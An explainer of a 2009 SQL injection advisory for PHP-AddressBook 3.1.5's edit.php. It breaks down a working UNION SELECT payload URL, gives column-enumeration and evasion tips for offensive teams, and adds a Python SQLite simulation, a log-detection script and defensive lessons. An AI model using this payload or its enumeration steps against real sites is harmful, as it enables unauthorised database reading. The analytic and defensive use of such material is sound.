PHP-AddressBook 3.1.5 'edit.php' SQL Injection Explained

What this paper is
This paper details a SQL injection vulnerability in the edit.php script of PHP-AddressBook version 3.1.5. The id parameter is concatenated into a database query, so an attacker can append SQL of their own. The published payload uses a UNION SELECT to read the database user, server version and database name, i.e. the demonstrated impact is information disclosure.
Simple technical breakdown
PHP-AddressBook is a web application for managing contacts. The edit.php script is likely used to display and edit existing contact entries. It probably fetches data from a database using an id to identify the specific record.
The vulnerability lies in how the id parameter is handled. Instead of properly sanitizing or parameterizing the input, the application directly incorporates the id value into an SQL query.
By sending a crafted id value, an attacker can:
- Break out of the intended SQL query.
- Inject a UNION SELECT statement.
- Combine data from the original query (which returns no rows because of the manipulated id) with data from a second query that extracts sensitive database information.
The exploit uses UNION SELECT to fit the attacker's chosen data (user, version, database name) into the column structure the original query returns.
Complete code and payload walkthrough
The provided exploit is a URL string, not a full script with code. The core of the exploit is the crafted URL:
www.[target].com/Script/edit.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14--
Let's break down the components:
- www.[target].com/Script/edit.php: the target URL pointing to the vulnerable script.
- ?id=: the start of the query string; id is the vulnerable parameter.
- -1: the initial value for id. It is chosen so that the original query, which would normally fetch one specific record, matches no row. The only row left in the result is then the one produced by the UNION SELECT, which makes the output easier to control and read. This is a common technique.
- +: a space character in URL encoding.
- union+select: the core of the SQL injection. It tells the database to append the result of a second SELECT statement to the result of the original query.
- 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14: the column list of the injected SELECT.
  - 1, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14: literal integers whose only purpose is to match the number of columns returned by the original query (a UNION requires both SELECTs to return the same number of columns). The attacker does not care about the data in these positions, only that the query structure is maintained.
  - concat_ws(0x3a,user(),version(),database()): the part that discloses information.
    - concat_ws(separator, string1, string2, ...): a MySQL function that concatenates strings with the specified separator.
    - 0x3a: a hexadecimal literal for the colon character (:), used as the separator between the extracted values. Writing it in hex avoids placing a quote character in the URL, which a naive filter might strip or escape.
    - user(): a MySQL function that returns the current database user (in user@host form).
    - version(): a MySQL function that returns the MySQL server version.
    - database(): a MySQL function that returns the current database name.
    - Combined, the function produces a string such as root@localhost:5.0.51b:php_addressbook (example values).
- --: the SQL comment marker. Everything after it on the line is ignored, which discards whatever the original query had after the id and so prevents a syntax error. MySQL only treats -- as a comment when it is followed by whitespace or the end of the statement; the paper's payload relies on id being the last thing in the query. If the script appends further SQL (an AND clause, ORDER BY, LIMIT), send --+ or -- - so that the marker is followed by a space after URL decoding.
Mapping list:
- www.[target].com/Script/edit.php?id= -> target script and vulnerable parameter.
- -1 -> value that makes the original query return no rows, so the UNION SELECT row is the only output.
- union+select -> SQL keywords that append a second SELECT's results to the first.
- 1, 3, 4, ... 14 -> placeholder values to match the column count of the original query.
- concat_ws(0x3a,user(),version(),database()) -> function call that extracts and formats the database user, server version and database name (no password is disclosed; user() returns the account name and host, not credentials).
- -- -> SQL comment that discards the remainder of the original query.
Payload Execution Flow:
- The web server receives the request with the crafted id.
- The edit.php script takes the id value (-1 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14--) from the query string.
- The script likely constructs an SQL query similar to:
  SELECT col1, col2, ... FROM some_table WHERE id = -1 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14--
- The -- comments out whatever the script appended after the id, so the statement parses cleanly.
- The database executes this query.
- The WHERE id = -1 clause matches no rows.
- UNION SELECT combines that empty result set with the single row produced by the attacker-controlled SELECT.
- concat_ws executes, producing the database user, version and database name separated by colons.
- edit.php then displays the combined result as if it were a contact record. The injected string (user:version:database) appears wherever the page renders the second column (col2 or similar) of the original result; the other positions show the literal integers.
Practical details for offensive operations teams
- Required Access Level: The paper gives a single GET URL and no login step; it does not say whether edit.php sits behind authentication, so treat "unauthenticated" as unconfirmed and verify it on the target. The demonstrated impact is information disclosure through SQL injection (user(), version(), database()), not remote code execution.
- Lab Preconditions:
- A running instance of PHP-AddressBook v3.1.5 (or a similarly vulnerable version).
- A web server (e.g., Apache, Nginx) configured to serve the PHP application.
- A MySQL database backend configured for the application.
- Network accessibility to the target web server.
- Tooling Assumptions:
- A web browser for manual testing.
- A web proxy (e.g., Burp Suite, OWASP ZAP) to intercept and modify requests.
- SQL injection tools (e.g., sqlmap) could automate this, but understanding the manual exploit is key.
- Execution Pitfalls:
  - URL Encoding: Spaces are represented by + or %20 in URLs. Ensure correct encoding; other special characters may also need encoding.
  - Database Type: The exploit uses MySQL-specific functions and syntax (user(), version(), database(), concat_ws(), 0x.. hex literals, --). It will not work directly against other database systems (PostgreSQL, SQL Server, Oracle) without modification.
  - Column Count Mismatch: If the original edit.php query selects a different number of columns than the 14 in the exploit, the UNION fails with MySQL error 1222 ("The used SELECT statements have a different number of columns"), not a syntax error. The attacker has to enumerate the correct column count first.
  - Output Display: Whether the data is visible depends on how edit.php renders the query results. If the injected value lands in a column the page does not display, the exploit appears to fail even though the query succeeded; move concat_ws() to another column position and retry.
  - WAF/IDS: Web application firewalls or intrusion detection systems may detect the UNION SELECT pattern or specific SQL keywords.
  - Application Logic: If the application validates id strictly (for example, casting it to an integer), the exploit is blocked before the query is built.
- Tradecraft Considerations:
  - Reconnaissance: Identify the target application and its version. Look for common web application vulnerabilities.
  - Enumeration: If the initial exploit fails because of the column count, enumerate the number of columns in the original query first. Send UNION SELECT NULL, NULL, ... with an increasing number of NULLs until the query stops erroring (NULL is accepted in every column type, so type mismatches do not cause false failures); ORDER BY n with increasing n, which errors once n exceeds the column count, gives the same answer.
  - Payload Customization: Adapt the concat_ws part to extract other information if needed, or to return data in a different format.
  - Stealth: Avoid overly aggressive scanning. For authorized engagements, focus on understanding the impact and reporting findings.
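The execution flow and the column-count enumeration described in this section, as an added example that is not from the paper or from PHP-AddressBook: a Python script that simulates a string-built query like the one edit.php is described as running, against an in-memory SQLite table. Everything here is constructed: the table, its fourteen column names and the single contact row are assumptions (the real schema is not on the page; fourteen columns are used so the advisory's 14-column payload lines up). SQLite has no user(), database() or concat_ws(), so the payload's second column uses the constant 'stub_user', sqlite_version() and the default schema name 'main' joined with char(58) (':', the 0x3a of the MySQL original). The script runs the payload through the vulnerable lookup, probes the column count with UNION SELECT NULL,..., and for contrast passes the same input through an integer check and a parameterized query.

```python
import sqlite3

# Constructed stand-in for the PHP-AddressBook contact table. The real schema is
# not on the page; fourteen placeholder columns match the advisory's payload.
COLUMNS = ["id", "firstname", "lastname", "email", "phone", "mobile", "address",
           "city", "state", "zip", "country", "company", "notes", "birthday"]

# The advisory payload with SQLite stand-ins: 'stub_user' for user(), 'main'
# (SQLite's default schema) for database(), char(58) for 0x3a, '||' for concat_ws.
PAYLOAD = ("-1 union select 1,'stub_user'||char(58)||sqlite_version()||char(58)||'main',"
           "3,4,5,6,7,8,9,10,11,12,13,14--")


def setup_db():
    """In-memory table with one constructed contact row."""
    conn = sqlite3.connect(":memory:")
    cols = "id INTEGER, " + ", ".join(c + " TEXT" for c in COLUMNS[1:])
    conn.execute("CREATE TABLE addressbook (%s)" % cols)
    conn.execute("INSERT INTO addressbook VALUES (1, 'Alice', 'Smith', 'alice@example.org',"
                 " '555-0100', '', '', '', '', '', '', '', '', '')")
    return conn


def vulnerable_lookup(conn, raw_id):
    """What the page describes edit.php doing: the id is spliced into the SQL text."""
    sql = "SELECT %s FROM addressbook WHERE id = %s" % (", ".join(COLUMNS), raw_id)
    return conn.execute(sql).fetchall()


def parse_id(raw_id):
    """Strict validation: accept only an integer id, reject anything else."""
    try:
        return int(raw_id)
    except (TypeError, ValueError):
        return None


def safe_lookup(conn, raw_id):
    """Parameterized form: the id travels as bound data, never as SQL text."""
    sql = "SELECT %s FROM addressbook WHERE id = ?" % ", ".join(COLUMNS)
    return conn.execute(sql, (raw_id,)).fetchall()


def enumerate_columns(conn, max_cols=30):
    """UNION SELECT NULL,... probe: the first count that does not raise a
    column-mismatch error is the width of the original query."""
    for n in range(1, max_cols + 1):
        probe = "-1 union select " + ",".join(["NULL"] * n) + "--"
        try:
            vulnerable_lookup(conn, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return None


if __name__ == "__main__":
    db = setup_db()
    print("legit request    :", vulnerable_lookup(db, "1"))
    print("column count     :", enumerate_columns(db))
    row = vulnerable_lookup(db, PAYLOAD)[0]
    print("injected column 2:", row[1])  # stub_user:<sqlite version>:main
    print("parse_id(payload):", parse_id(PAYLOAD))
    print("safe lookup      :", safe_lookup(db, PAYLOAD))
```

The injected string lands in the second position of the returned row, which is where this constructed schema would render the first name; the other positions carry the literal integers, exactly as the flow above predicts. Against real MySQL the probe loop sees error 1222 rather than SQLite's "SELECTs to the left and right of UNION do not have the same number of result columns", and the same loop body works once the exception type is changed.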
Where this was used and when
- Context: This exploit targets a specific web application (PHP-AddressBook) and a particular script (edit.php). It is representative of the SQL injection vulnerabilities common in older PHP web applications that build queries by string concatenation.
- Timeframe: The paper was published on 2009-12-31 (Exploit-DB paper 10877). This class of vulnerability was prevalent in web applications during the late 2000s and early 2010s. PHP-AddressBook 3.1.5 itself is long outdated, but the UNION-based technique remains the standard way of confirming and characterising an injection point.
Defensive lessons for modern teams
- Input Validation and Sanitization: Never trust user input. All data received from the client (URL parameters, form fields, cookies, etc.) must be validated and sanitized before being used in database queries.
- Parameterized Queries (Prepared Statements): This is the most effective defense against SQL injection. Instead of building SQL strings with user input, use parameterized queries where the SQL logic is separated from the data. The database engine treats the input strictly as data, not executable code.
- Least Privilege Principle: The database user account used by the web application should have only the minimum necessary permissions. It should not have privileges to execute administrative commands or access sensitive system tables unless absolutely required.
- Web Application Firewalls (WAFs): WAFs can provide a layer of defense by detecting and blocking common SQL injection patterns. However, they are not foolproof and should be used in conjunction with secure coding practices.
- Regular Patching and Updates: Keep all web applications, frameworks, and server software up to date with the latest security patches.
- Error Handling: Configure applications to display generic error messages to users. Detailed database error messages can leak sensitive information to attackers.
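The detection side of the WAF/IDS point, as an added example that is not part of the page or of PHP-AddressBook: a Python pass over Apache-style access log lines. The log lines are constructed for this example (the second carries the advisory's payload verbatim, the third a mixed-case, percent-encoded column-count probe with an inline comment in place of whitespace). The query string is decoded and normalised before matching, so the encoding tricks from the URL Encoding pitfall do not hide the UNION SELECT, and the "id must be an integer" check from the Application Logic pitfall is applied as well, which catches probes that use no recognisable keyword.

```python
import re
from urllib.parse import unquote_plus, parse_qs

# Constructed Apache combined-style access log lines (not from any real server).
LOG_LINES = [
    '203.0.113.5 - - [31/Dec/2009:10:00:00 +0000] "GET /Script/edit.php?id=7 HTTP/1.1" 200 2113',
    '203.0.113.5 - - [31/Dec/2009:10:00:05 +0000] "GET /Script/edit.php?id=-1+union+select+1,'
    'concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14-- HTTP/1.1" 200 2342',
    '198.51.100.9 - - [31/Dec/2009:10:01:00 +0000] "GET /Script/edit.php?id=-1%20UnIoN/**/SeLeCt%20NULL,NULL,NULL-- HTTP/1.1" 500 512',
    '198.51.100.9 - - [31/Dec/2009:10:01:30 +0000] "GET /Script/index.php HTTP/1.1" 200 4001',
]

LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+$')

# Indicators matched against the decoded, normalised query string.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "mysql_info_function": re.compile(r"\b(?:user|version|database)\(\)"),
    "comment_terminator": re.compile(r"--(?:\s|$)"),
}


def normalise_query(path):
    """Undo the evasions an attacker controls: percent/plus encoding, letter
    case, and MySQL inline comments used in place of whitespace."""
    query = path.partition("?")[2]
    decoded = unquote_plus(query)
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded).lower()


def indicators_for(path):
    """Names of every indicator present in one request path."""
    found = []
    norm = normalise_query(path)
    for name, pattern in SIGNATURES.items():
        if pattern.search(norm):
            found.append(name)
    # Application-logic check: edit.php's id should only ever be an integer.
    for value in parse_qs(path.partition("?")[2]).get("id", []):
        if not re.fullmatch(r"-?\d+", value):
            found.append("non_integer_id")
            break
    return found


def analyse(lines):
    """Return one record per request that carries at least one indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        found = indicators_for(m.group("path"))
        if found:
            hits.append({"client": m.group("client"), "status": m.group("status"),
                         "path": m.group("path"), "indicators": found})
    return hits


if __name__ == "__main__":
    for hit in analyse(LOG_LINES):
        print(hit["client"], hit["status"], hit["indicators"])
```

The status code is kept in each hit for a reason: a run of 500 responses to UNION SELECT NULL,... requests from one client, followed by a 200, is the column-count enumeration from the tradecraft section showing up in the logs, and the transition marks the request that found the right width.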
ASCII visual (if applicable)
This exploit is a direct manipulation of a URL and SQL query. An ASCII visual for the flow might look like this:
+-----------------+      +-----------------+      +---------------------+
| Attacker's      |----->| Web Server      |----->| PHP-AddressBook     |
| Browser/Tool    |      | (Receives Req)  |      | (edit.php script)   |
+-----------------+      +-----------------+      +----------+----------+
                                                             |
                                                             | (Constructs SQL Query)
                                                             v
                                                  +---------------------+
                                                  | Database Server     |
                                                  | (MySQL)             |
                                                  |                     |
                                                  | - Executes Query    |
                                                  | - Returns Data      |
                                                  +----------+----------+
                                                             |
                                                             | (Results Sent Back)
                                                             v
                                                  +---------------------+
                                                  | PHP-AddressBook     |
                                                  | (Displays Results)  |
                                                  +---------------------+
Source references
- Paper ID: 10877
- Paper Title: PHP-AddressBook 3.1.5 - 'edit.php' SQL Injection
- Author: Hussin X
- Published: 2009-12-31
- Paper URL: https://www.exploit-db.com/papers/10877
- Raw Exploit URL: https://www.exploit-db.com/raw/10877
Original Exploit-DB Content (Verbatim)
@ php-addressbook v3.1.5(edit.php) SQL Injection Vulnerability
@ Author: Hussin X
@ Home : www.iq-ty.com<http://www.iq-ty.com>,
@ email: darkangel_g85[at]Yahoo[dot]com
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ script : http://sourceforge.net/project/showfiles.php?group_id=157964
@ DorK : php-addressbook v3.1.5
ExPloiT :
www.[target].com/Script/edit.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14--
end
IQ-SecuritY FoRuM